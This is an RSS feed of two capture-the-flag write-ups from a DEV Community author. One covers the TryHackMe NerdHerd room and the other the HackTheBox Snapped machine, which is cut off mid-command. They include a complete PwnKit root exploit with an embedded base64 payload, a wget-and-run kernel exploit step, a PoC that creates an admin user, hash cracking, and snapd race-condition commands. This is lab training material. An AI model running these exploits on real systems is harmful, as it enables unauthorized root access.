DEV Community: Yogeshwar Peela The latest articles on DEV Community by Yogeshwar Peela (@exploitnotes). https://dev.to/exploitnotes https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3953474%2F44022a43-aec2-495f-9244-5a1e6ddc9e42.jpg DEV Community: Yogeshwar Peela https://dev.to/exploitnotes en TryHackMe - NerdHerd writeup Yogeshwar Peela Tue, 16 Jun 2026 12:51:03 +0000 https://dev.to/exploitnotes/tryhackme-nerdherd-writeup-10m https://dev.to/exploitnotes/tryhackme-nerdherd-writeup-10m <p><strong>Platform:</strong> TryHackMe<br><br> <strong>Difficulty:</strong> Easy<br><br> <strong>OS:</strong> Linux </p> <h2> Reconnaissance </h2> <h3> Nmap </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p-</span> <span class="nt">-A</span> MACHINE_IP <span class="nt">-oA</span> nmap </code></pre> </div> <p>Open ports:</p> <ul> <li> <strong>21/tcp</strong> — vsftpd 3.0.3 (Anonymous FTP allowed)</li> <li> <strong>22/tcp</strong> — OpenSSH 7.2p2 (Ubuntu)</li> <li> <strong>139/445/tcp</strong> — Samba 4.3.11-Ubuntu (hostname: NERDHERD)</li> <li> <strong>1337/tcp</strong> — Apache 2.4.18 (Ubuntu)</li> </ul> <p>Hostname revealed via NetBIOS: <code>NERDHERD</code>.</p> <h2> Enumeration </h2> <h3> FTP — Anonymous Login </h3> <p>Anonymous FTP was open. The <code>pub/</code> directory contained a hidden folder <code>.jokesonyou</code> with <code>hellon3rd.txt</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>all you need is in the leet </code></pre> </div> <p>Also present was <code>youfoundme.png</code>. Running <code>exiftool</code> on it revealed an interesting EXIF field:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight properties"><code><span class="err">Owner</span> <span class="py">Name</span> <span class="p">:</span> <span class="s">fijbxslz</span> </code></pre> </div> <p>This looked like a Vigenère-ciphered string.</p> <h3> Web — Port 1337 </h3> <p>The default Apache page at <code>http://MACHINE_IP:1337</code> contained hidden HTML comments hinting to keep digging. A linked YouTube video — "Surfin' Bird" by The Trashmen — holds the key phrase: <strong>"bird is the word"</strong>.</p> <p>Directory brute-forcing found <code>/admin/</code>, which served a login page. The page source contained two Base64-encoded strings:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'Y2liYXJ0b3dza2k='</span> | <span class="nb">base64</span> <span class="nt">-d</span> <span class="c"># cibartowski</span> <span class="nb">echo</span> <span class="s1">'aGVoZWdvdTwdasddHlvdQ=='</span> | <span class="nb">base64</span> <span class="nt">-d</span> <span class="c"># hehegou (invalid/decoy)</span> </code></pre> </div> <p>These turned out to be rabbit holes.</p> <h3> Vigenère Cipher </h3> <p>The Vigenère cipher is a polyalphabetic substitution cipher where each plaintext character is shifted by the value of the corresponding key character. Decryption reverses this: for each position, subtract the key character's index from the ciphertext character's index, modulo 26. The key repeats cyclically to cover the full ciphertext length.</p> <p>The EXIF <code>Owner Name</code> field contained <code>fijbxslz</code> — 8 random-looking lowercase characters with no dictionary meaning, a strong indicator of encryption or encoding. The YouTube link embedded in the web page (<code>/icons/ubuntu-logo.png</code> comment area) pointed to "Surfin' Bird" by The Trashmen, whose defining lyric is <strong>"bird is the word"</strong>. Stripping spaces gives the candidate key: <code>birdistheword</code>.</p> <p>Applying Vigenère decryption with key <code>birdistheword</code> (only the first 8 characters <code>birdisth</code> are used since the ciphertext is 8 chars long):</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Position</th> <th>Ciphertext</th> <th>Key char</th> <th>CT index - Key index (mod 26)</th> <th>Plaintext</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>f (5)</td> <td>b (1)</td> <td>4</td> <td>e</td> </tr> <tr> <td>1</td> <td>i (8)</td> <td>i (8)</td> <td>0</td> <td>a</td> </tr> <tr> <td>2</td> <td>j (9)</td> <td>r (17)</td> <td>18</td> <td>s</td> </tr> <tr> <td>3</td> <td>b (1)</td> <td>d (3)</td> <td>24</td> <td>y</td> </tr> <tr> <td>4</td> <td>x (23)</td> <td>i (8)</td> <td>15</td> <td>p</td> </tr> <tr> <td>5</td> <td>s (18)</td> <td>s (18)</td> <td>0</td> <td>a</td> </tr> <tr> <td>6</td> <td>l (11)</td> <td>t (19)</td> <td>18</td> <td>s</td> </tr> <tr> <td>7</td> <td>z (25)</td> <td>h (7)</td> <td>18</td> <td>s</td> </tr> </tbody> </table></div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Ciphertext : f i j b x s l z Key : b i r d i s t h (first 8 of "birdistheword") Plaintext : e a s y p a s s </code></pre> </div> <p>This was decoded using <a href="https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode(%27birdistheword%27)" rel="noopener noreferrer">CyberChef</a> (Vigenère Decode operation) with key <code>birdistheword</code>.</p> <h3> SMB Enumeration </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nxc smb MACHINE_IP <span class="nt">-u</span> <span class="s1">''</span> <span class="nt">-p</span> <span class="s1">''</span> <span class="nt">--users</span> </code></pre> </div> <p>One user found: <strong>chuck</strong> (full name: ChuckBartowski).</p> <p>Accessing the <code>nerdherd_classified</code> share with discovered credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smbclient //MACHINE_IP/nerdherd_classified <span class="nt">-U</span> chuck%easypass smb: <span class="se">\&gt;</span> get secr3t.txt </code></pre> </div> <p>Contents of <code>secr3t.txt</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Ssssh! don't tell this anyone because you deserved it this far: check out "/this1sn0tadirect0ry" </code></pre> </div> <h3> Hidden Web Directory </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl http://MACHINE_IP:1337/this1sn0tadirect0ry/creds.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alright, enough with the games. here, take my ssh creds: chuck : th1s41ntmypa5s </code></pre> </div> <h2> Initial Access </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh chuck@MACHINE_IP </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">chuck@nerdherd:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt <span class="go">THM{REDACTED} </span></code></pre> </div> <h2> Privilege Escalation </h2> <h3> Enumeration </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-l</span> <span class="c"># Sorry, user chuck may not run sudo on nerdherd.</span> <span class="nb">uname</span> <span class="nt">-r</span> <span class="c"># 4.4.0-31-generic</span> </code></pre> </div> <p>No sudo rights. Kernel <code>4.4.0-31-generic</code> is vulnerable to CVE-2017-16995 — a BPF verifier bypass affecting Linux &lt; 4.13.9 on Ubuntu 16.04.</p> <h3> CVE-2017-16995 — Kernel LPE (EDB-45010) </h3> <p>On the attacker machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>searchsploit <span class="nt">-m</span> 45010 python3 <span class="nt">-m</span> http.server 80 </code></pre> </div> <p>On the target:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd</span> /tmp wget http://YOUR_IP/45010.c gcc 45010.c <span class="nt">-o</span> pwn ./pwn </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">[*] credentials patched, launching shell... </span><span class="gp">#</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">root </span></code></pre> </div> <h3> Alternative: CVE-2021-4034 — Polkit pkexec LPE </h3> <p>The target also runs <code>pkexec</code> version 0.105 on kernel <code>4.4.0-31-generic</code>, making it vulnerable to CVE-2021-4034 (PwnKit). This Python PoC abuses a NULL argv passed to <code>execve()</code> combined with a GCONV_PATH environment variable trick to load a malicious shared library as root.</p> <p>Save the following as <code>e.py</code> in <code>/tmp</code> on the target:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#!/usr/bin/env python3 # CVE-2021-4034 — pkexec LPE (PwnKit) </span><span class="kn">import</span> <span class="n">base64</span><span class="p">,</span> <span class="n">os</span><span class="p">,</span> <span class="n">sys</span> <span class="kn">from</span> <span class="n">ctypes</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="n">ctypes.util</span> <span class="kn">import</span> <span class="n">find_library</span> <span class="c1"># msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64 # PrependSetuid=true is critical — without it you get a shell as current user, not root </span><span class="n">payload_b64</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">'''</span><span class="s"> f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU= </span><span class="sh">'''</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">b64decode</span><span class="p">(</span><span class="n">payload_b64</span><span class="p">)</span> <span class="n">environ</span> <span class="o">=</span> <span class="p">[</span> <span class="sa">b</span><span class="sh">'</span><span class="s">exploit</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">PATH=GCONV_PATH=.</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">LC_MESSAGES=en_US.UTF-8</span><span class="sh">'</span><span class="p">,</span> <span class="sa">b</span><span class="sh">'</span><span class="s">XAUTHORITY=../LOL</span><span class="sh">'</span><span class="p">,</span> <span class="bp">None</span> <span class="p">]</span> <span class="n">libc</span> <span class="o">=</span> <span class="nc">CDLL</span><span class="p">(</span><span class="nf">find_library</span><span class="p">(</span><span class="sh">'</span><span class="s">c</span><span class="sh">'</span><span class="p">))</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[+] Creating shared library for exploit code.</span><span class="sh">'</span><span class="p">)</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">payload.so</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">os</span><span class="p">.</span><span class="nf">chmod</span><span class="p">(</span><span class="sh">'</span><span class="s">payload.so</span><span class="sh">'</span><span class="p">,</span> <span class="mo">0o0755</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">os</span><span class="p">.</span><span class="nf">mkdir</span><span class="p">(</span><span class="sh">'</span><span class="s">GCONV_PATH=.</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span> <span class="nb">FileExistsError</span><span class="p">:</span> <span class="k">pass</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">GCONV_PATH=./exploit</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="sa">b</span><span class="sh">''</span><span class="p">)</span> <span class="n">os</span><span class="p">.</span><span class="nf">chmod</span><span class="p">(</span><span class="sh">'</span><span class="s">GCONV_PATH=./exploit</span><span class="sh">'</span><span class="p">,</span> <span class="mo">0o0755</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">os</span><span class="p">.</span><span class="nf">mkdir</span><span class="p">(</span><span class="sh">'</span><span class="s">exploit</span><span class="sh">'</span><span class="p">)</span> <span class="k">except</span> <span class="nb">FileExistsError</span><span class="p">:</span> <span class="k">pass</span> <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">exploit/gconv-modules</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">wb</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="p">.</span><span class="nf">write</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">module UTF-8// INTERNAL ../payload 2</span><span class="se">\n</span><span class="sh">'</span><span class="p">)</span> <span class="n">environ_p</span> <span class="o">=</span> <span class="p">(</span><span class="n">c_char_p</span> <span class="o">*</span> <span class="nf">len</span><span class="p">(</span><span class="n">environ</span><span class="p">))()</span> <span class="n">environ_p</span><span class="p">[:]</span> <span class="o">=</span> <span class="n">environ</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[+] Calling execve()</span><span class="sh">'</span><span class="p">)</span> <span class="n">libc</span><span class="p">.</span><span class="nf">execve</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">/usr/bin/pkexec</span><span class="sh">'</span><span class="p">,</span> <span class="nf">c_char_p</span><span class="p">(</span><span class="bp">None</span><span class="p">),</span> <span class="n">environ_p</span><span class="p">)</span> </code></pre> </div> <p>Run it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd</span> /tmp python3 e.py </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">[+] Creating shared library for exploit code. [+] Calling execve() </span><span class="gp">#</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">root </span></code></pre> </div> <p>The exploit passes <code>NULL</code> as argv to <code>execve()</code> against <code>pkexec</code>, which mishandles the missing argument count and loads an attacker-controlled shared library via the GCONV_PATH environment variable trick, executing the embedded ELF payload with root privileges.</p> <h3> Finding the Real Flag </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># cat /root/root.txt</span> <span class="c"># cmon, wouldnt it be too easy if i place the root flag here?</span> <span class="c"># find / -type f -name "*.txt" 2&gt;/dev/null</span> <span class="c"># ...</span> <span class="c"># /opt/.root.txt ← real flag</span> <span class="c"># cat /opt/.root.txt</span> THM<span class="o">{</span>REDACTED<span class="o">}</span> </code></pre> </div> <p>The <code>root.txt</code> in <code>/root</code> is a decoy; the actual flag is at <code>/opt/.root.txt</code>.</p> <h2> Summary </h2> <p>NerdHerd is a multi-stage easy room with a CTF puzzle feel. The chain involves extracting a Vigenère-ciphered password from image EXIF metadata, resolving the key from a YouTube easter egg, enumerating SMB to find a username, then retrieving SSH credentials from a hidden web directory. Privilege escalation exploits an unpatched kernel (CVE-2017-16995) via BPF verifier bypass. The room adds a decoy root flag to reward thorough enumeration.</p> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Anonymous FTP exposing image with EXIF data</td> <td>Information disclosure</td> </tr> <tr> <td>2</td> <td>Vigenère-encoded password in EXIF Owner Name field</td> <td>Credential discovery</td> </tr> <tr> <td>3</td> <td>SMB null session user enumeration</td> <td>Username disclosure (chuck)</td> </tr> <tr> <td>4</td> <td>Hardcoded SSH creds in hidden web directory</td> <td>Initial access as chuck</td> </tr> <tr> <td>5</td> <td>CVE-2017-16995 — Linux kernel &lt; 4.13.9 BPF LPE</td> <td>Root shell</td> </tr> <tr> <td>6</td> <td>CVE-2021-4034 — pkexec NULL argv + GCONV_PATH LPE (PwnKit)</td> <td>Root shell (alternative path)</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Anonymous FTP → youfoundme.png │ ▼ exiftool → Owner Name: fijbxslz (Vigenère ciphertext) Web page YouTube link → key: "birdistheword" Vigenère decrypt → "easypass" │ ▼ SMB null session → user: chuck smbclient //MACHINE_IP/nerdherd_classified -U chuck%easypass → secr3t.txt → hint: /this1sn0tadirect0ry │ ▼ curl MACHINE_IP:1337/this1sn0tadirect0ry/creds.txt → chuck:th1s41ntmypa5s │ ▼ SSH login → user.txt │ ▼ uname -r: 4.4.0-31-generic → CVE-2017-16995 (EDB-45010) gcc 45010.c -o pwn &amp;&amp; ./pwn → root shell │ ▼ /opt/.root.txt (real flag — /root/root.txt is a decoy) </code></pre> </div> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>Nmap</td> <td>Port scanning and service enumeration</td> </tr> <tr> <td>ftp / smbclient</td> <td>Anonymous FTP and SMB share access</td> </tr> <tr> <td>NetExec (nxc)</td> <td>SMB null session user enumeration</td> </tr> <tr> <td>exiftool</td> <td>EXIF metadata extraction</td> </tr> <tr> <td>CyberChef</td> <td>Vigenère decryption</td> </tr> <tr> <td>dirsearch</td> <td>Web directory brute-forcing</td> </tr> <tr> <td>curl</td> <td>HTTP endpoint inspection</td> </tr> <tr> <td>GCC</td> <td>Compiling CVE-2017-16995 exploit</td> </tr> <tr> <td>CVE-2017-16995 (EDB-45010)</td> <td>Kernel privilege escalation</td> </tr> <tr> <td>CVE-2021-4034 Python PoC</td> <td>pkexec privilege escalation (alternative)</td> </tr> </tbody> </table></div> beginners cybersecurity linux tutorial HackTheBox - Snapped Writeup Yogeshwar Peela Tue, 16 Jun 2026 05:59:53 +0000 https://dev.to/exploitnotes/hackthebox-snapped-writeup-3idb https://dev.to/exploitnotes/hackthebox-snapped-writeup-3idb <p><strong>Platform:</strong> HackTheBox<br><br> <strong>Difficulty:</strong> Medium<br><br> <strong>OS:</strong> Linux</p> <h2> Reconnaissance </h2> <p>We begin with a standard nmap scan to identify open ports and running services.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-A</span> MACHINE-IP <span class="nt">-oA</span> output_file </code></pre> </div> <p>Open ports:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Port</th> <th>Service</th> </tr> </thead> <tbody> <tr> <td>22</td> <td>SSH (tcpwrapped)</td> </tr> <tr> <td>80</td> <td>nginx/1.24.0 — redirects to <code>http://snapped.htb/</code> </td> </tr> </tbody> </table></div> <p>The scan reveals two services: SSH on port 22 and an nginx web server on port 80 that redirects to <code>snapped.htb</code>. We add the hostname to <code>/etc/hosts</code> and browse to port 80. The landing page offers no obvious attack surface — no login forms, no file uploads, nothing interactive. This tells us enumeration is the next logical step.</p> <h2> Vhost Enumeration </h2> <p>Since the main domain is quiet, there may be virtual hosts (subdomains) serving different applications on the same IP. We fuzz for them using ffuf.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ffuf <span class="nt">-u</span> http://snapped.htb <span class="nt">-H</span> <span class="s2">"HOST: FUZZ.snapped.htb"</span> <span class="se">\</span> <span class="nt">-w</span> /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt <span class="nt">-ac</span> </code></pre> </div> <p><strong>Result:</strong> <code>admin.snapped.htb</code> (HTTP 200)</p> <p>We add <code>admin.snapped.htb</code> to <code>/etc/hosts</code> and navigate to it. A login page appears — this is the <strong>Nginx UI</strong> admin panel. Default credentials (<code>admin:admin</code>, <code>admin:password</code>, etc.) all fail, so we don't try to brute force the login. Instead, we investigate what the application exposes before authentication.</p> <h2> API Endpoint Discovery </h2> <p>While browsing the admin panel, we notice that a request to <code>/api/install</code> returns HTTP 200 — even without logging in. This hints that the API may not enforce authentication consistently. We run a directory brute force specifically against the <code>/api/</code> path.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>feroxbuster <span class="nt">-u</span> http://admin.snapped.htb/api/ <span class="se">\</span> <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="se">\</span> <span class="nt">-C</span> 500,403,404 <span class="nt">-t</span> 30 <span class="nt">-d</span> 3 </code></pre> </div> <p>Discovered endpoints:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Endpoint</th> <th>Status</th> </tr> </thead> <tbody> <tr> <td><code>/api/install</code></td> <td>200</td> </tr> <tr> <td><code>/api/backup</code></td> <td>200</td> </tr> <tr> <td><code>/api/licenses</code></td> <td>200</td> </tr> </tbody> </table></div> <p>The <code>/api/backup</code> endpoint stands out immediately — a backup endpoint that returns HTTP 200 without any credentials is a significant finding. We probe it manually with curl.</p> <h2> CVE-2026-27944 - Nginx UI Backup Disclosure </h2> <p>Fetching <code>/api/backup</code> unauthenticated returns a ZIP archive. But what really catches the eye is the response header:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-v</span> http://admin.snapped.htb/api/backup <span class="nt">--output</span> backup.zip </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">X-Backup-Security: MgzdI0XJazQ2pR+7FC1BHFZQWxltjcKkp2AqhZcV2QI=:qeClzKyylJyq73sCCc5DJQ== </span></code></pre> </div> <p>This is <strong>CVE-2026-27944</strong>. Nginx UI encrypts its backup with AES-256, but then leaks the encryption key and IV directly in a response header — <code>X-Backup-Security</code> contains <code>&lt;Base64 AES key&gt;:&lt;Base64 IV&gt;</code>. Any unauthenticated attacker who requests the backup also receives everything needed to decrypt it. The encryption provides zero security.</p> <p>A public PoC handles decryption and even creates a new admin user as a bonus:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>git clone https://github.com/Skynoxk/CVE-2026-27944 <span class="nb">cd </span>CVE-2026-27944 python exploit_enhanced.py <span class="nt">--target</span> http://admin.snapped.htb <span class="nt">--decrypt</span> <span class="nt">--create-user</span> hacker <span class="nt">--password</span> Pwned@123! </code></pre> </div> <p>The decrypted backup contains a <code>nginx-ui/</code> directory with a <code>database.db</code> SQLite file — the application's entire user database.</p> <h2> Credential Extraction &amp; Hash Cracking </h2> <p>We inspect the database to find stored user accounts.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>sqlite3 database.db sqlite&gt; .tables sqlite&gt; <span class="k">select</span> <span class="k">*</span> from <span class="nb">users</span><span class="p">;</span> </code></pre> </div> <p>Two records are returned: <code>admin</code> and <code>jonathan</code>, each with a bcrypt password hash. The <code>$2a$10$</code> prefix identifies these as <strong>bcrypt with cost factor 10</strong>.</p> <p>We save the hashes to a file and run hashcat against the rockyou wordlist:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>hashcat <span class="nt">-m</span> 3200 hashes.txt /usr/share/wordlists/rockyou.txt </code></pre> </div> <p><code>-m 3200</code> is the hashcat mode for bcrypt <code>$2*$</code>. One of the hashes cracks successfully, giving us <code>jonathan</code>'s plaintext password.</p> <h2> User Flag </h2> <p>With valid credentials for <code>jonathan</code>, we try SSH — and the password works, confirming credential reuse between the web application and the system account.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh jonathan@snapped.htb </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">jonathan@snapped:~$</span><span class="w"> </span><span class="nb">cat </span>user.txt <span class="go">HTB{REDACTED} </span></code></pre> </div> <h2> Privilege Escalation - CVE-2026-3888 (snapd Race Condition) </h2> <h3> Background </h3> <p>After landing as <code>jonathan</code>, we look for privilege escalation paths. The system is running a vulnerable version of <code>snapd</code>. The SUID binary <code>snap-confine</code> (used by snapd to set up application sandboxes) is at the center of this exploit.</p> <p>Here is how the vulnerability works:</p> <ul> <li> <code>snap-confine</code> runs as SUID root and creates a temporary sandbox directory under <code>/tmp/.snap/</code> </li> <li>systemd's <code>tmpfiles</code> service is configured (via <code>/usr/lib/tmpfiles.d/tmp.conf</code>) to clean <code>/tmp</code> every <strong>4 minutes</strong>: <code>D /tmp 1777 root root 4m</code> </li> <li>When the cleanup deletes <code>.snap</code>, there is a brief window between deletion and recreation where an attacker can place their own directory or symlink in its place</li> <li> <code>snap-confine</code> will then operate on the attacker-controlled path — allowing arbitrary file writes as root</li> <li>By targeting the dynamic linker (<code>ld-linux-x86-64.so.2</code>) inside the sandbox's root filesystem, we can make any SUID binary load our malicious shared library and execute code as root</li> </ul> <h3> Preparation </h3> <p>On our attack machine, we compile two components:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>gcc <span class="nt">-O2</span> <span class="nt">-static</span> <span class="nt">-o</span> firefox_2404 firefox_2404.c gcc <span class="nt">-nostdlib</span> <span class="nt">-static</span> <span class="nt">-Wl</span>,--entry<span class="o">=</span>_start <span class="nt">-o</span> librootshell.so librootshell.c </code></pre> </div> <ul> <li> <code>firefox_2404</code> — the race condition exploit binary; it monitors <code>/tmp/.snap</code> deletion and rapidly swaps directories at the right moment to win the race</li> <li> <code>librootshell.so</code> — a malicious shared library crafted to execute arbitrary code when loaded; it will replace the real dynamic linker inside the sandbox</li> </ul> <p>Upload both to the target:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>scp firefox_2404 librootshell.so jonathan@snapped.htb:~/ </code></pre> </div> <h3> Exploitation </h3> <p>The exploit requires three coordinated terminal sessions.</p> <p><strong>Terminal 1 - Start the sandbox and note the PID</strong></p> <p>We invoke <code>snap-confine</code> directly with a clean environment to start the sandbox process. This creates the <code>/tmp/.snap/</code> directory that the exploit targets.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">env</span> <span class="nt">-i</span> <span class="nv">SNAP_INSTANCE_NAME</span><span class="o">=</span>firefox /usr/lib/snapd/snap-confine <span class="se">\</span> <span class="nt">--base</span> core22 snap.firefox.hook.configure /bin/bash </code></pre> </div> <p>Inside the sandbox shell, record the PID — we'll need it to navigate via <code>/proc</code> later:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd</span> /tmp <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="nv">$$</span> </code></pre> </div> <p>Now keep the <code>/tmp</code> directory "touched" (preventing aggressive cleanup) while still allowing <code>.snap</code> to be deleted when its timer fires:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="k">while </span><span class="nb">test</span> <span class="nt">-d</span> ./.snap<span class="p">;</span> <span class="k">do </span><span class="nb">touch</span> ./<span class="p">;</span> <span class="nb">sleep </span>1<span class="p">;</span> <span class="k">done</span> </code></pre> </div> <p>This loop runs until <code>.snap</code> is deleted by systemd, signalling that the race window has opened.</p> <p><strong>Terminal 2 - Break cached namespaces and weaken the sandbox</strong></p> <p>We navigate into the sandbox's current working directory via procfs — this gives us access even through namespace restrictions:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd</span> /proc/PID/cwd </code></pre> </div> <p>We then escape the cached namespace context by spawning a new systemd scope:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>systemd-run <span class="nt">--user</span> <span class="nt">--scope</span> <span class="nt">--unit</span><span class="o">=</span>snap.d<span class="si">$(</span><span class="nb">date</span> +%s<span class="si">)</span> /bin/bash </code></pre> </div> <p>Next, we intentionally trigger a failing <code>snap-confine</code> invocation using an invalid base:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">env</span> <span class="nt">-i</span> <span class="nv">SNAP_INSTANCE_NAME</span><span class="o">=</span>firefox /usr/lib/snapd/snap-confine <span class="se">\</span> <span class="nt">--base</span> snapd snap.firefox.hook.configure /nonexistent </code></pre> </div> <p>This is expected to fail. The value it provides is that it leaves the mount namespace in an inconsistent state, reducing the sandbox's ability to detect or prevent our manipulation.</p> <p><strong>Trigger the race:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>~/firefox_2404 ~/librootshell.so </code></pre> </div> <p><code>firefox_2404</code> watches for <code>.snap</code> deletion, and the moment it happens, it swaps the directory with our controlled path. Successful output reads <code>trigger detected</code> and <code>swap done</code>. If neither appears, restart from Terminal 1 and wait for the next 4-minute cleanup cycle.</p> <p><strong>Terminal 3 - Inject the payload into the poisoned filesystem</strong></p> <p>The exploit writes a file <code>race_pid.txt</code> containing the PID of the new root-level process. We read it and jump into that process's root filesystem via procfs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">PID</span><span class="o">=</span><span class="si">$(</span><span class="nb">cat</span> /proc/ORIGINAL_PID/cwd/race_pid.txt<span class="si">)</span> <span class="nb">cd</span> /proc/<span class="nv">$PID</span>/root </code></pre> </div> <p><code>/proc/&lt;PID&gt;/root</code> gives us a view of the filesystem as seen by the target process — and because we won the race, this is now our controlled sandbox environment.</p> <p>We place a usable shell binary inside the sandbox (the environment is minimal, so we use busybox):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cp</span> /usr/bin/busybox 